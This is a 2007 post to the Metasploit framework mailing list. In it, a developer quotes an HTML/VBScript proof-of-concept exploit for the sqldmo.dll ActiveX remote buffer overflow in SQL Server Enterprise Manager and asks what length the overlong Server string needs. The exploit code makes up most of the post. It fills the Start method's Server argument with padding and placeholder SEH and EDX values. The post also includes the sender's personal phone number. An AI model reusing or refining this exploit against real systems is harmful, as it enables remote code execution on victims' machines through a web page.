[framework] Microsoft SQL Server Distributed Management Objects OLE DLL for
Manish Gupta
manish.gupta at ariosesoftware.com
Thu Sep 13 22:41:53 CDT 2007
Hi
I want to know the server string length of Microsoft SQL Server Distributed
Management Objects OLE DLL which has been published on 7th of Sept. 2007 .
Regards
Manish Gupta
Ariose Software
Noida (U.P)
Mbl:-+91-9891650667
_____
From: Manish Gupta [mailto:manish.gupta at ariosesoftware.com]
Sent: Thursday, September 13, 2007 6:05 PM
To: framework at metasploit.com
Subject: [framework] Microsoft SQL Server Distributed Management Objects OLE
DLL for
Hi
Am working on "Microsoft SQL Server Distributed Management Objects OLE DLL
for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" on this
vulnerability whose exploit is
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer'
/></object>
<script language='vbscript'>
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As
Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )"
memberName = "Start"
progid = "SQLDMO.SQLServer"
argCount = 4
'edx = ecx
edx ="bb"
seh ="aa"
StartMode =True
Server
="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\te
s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\
\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\
test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx
+
"nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR
R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC
C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#
$%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff
fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login ="aaaaaaaa"
Password ="bbbbbbbb"
SQLServer.Start StartMode ,Server ,Login ,Password
</script>
</html>
I am not able to find the server length so please help me.
Server
="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\te
s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\
\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\
test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx
+
"nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR
R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC
C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#
$%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff
fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
\\
Regards
Manish Gupta
Ariose Software
Noida (U.P)
Mbl:-+91-9891650667
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20070914/a288c8b2/attachment.htm
More information about the framework
mailing list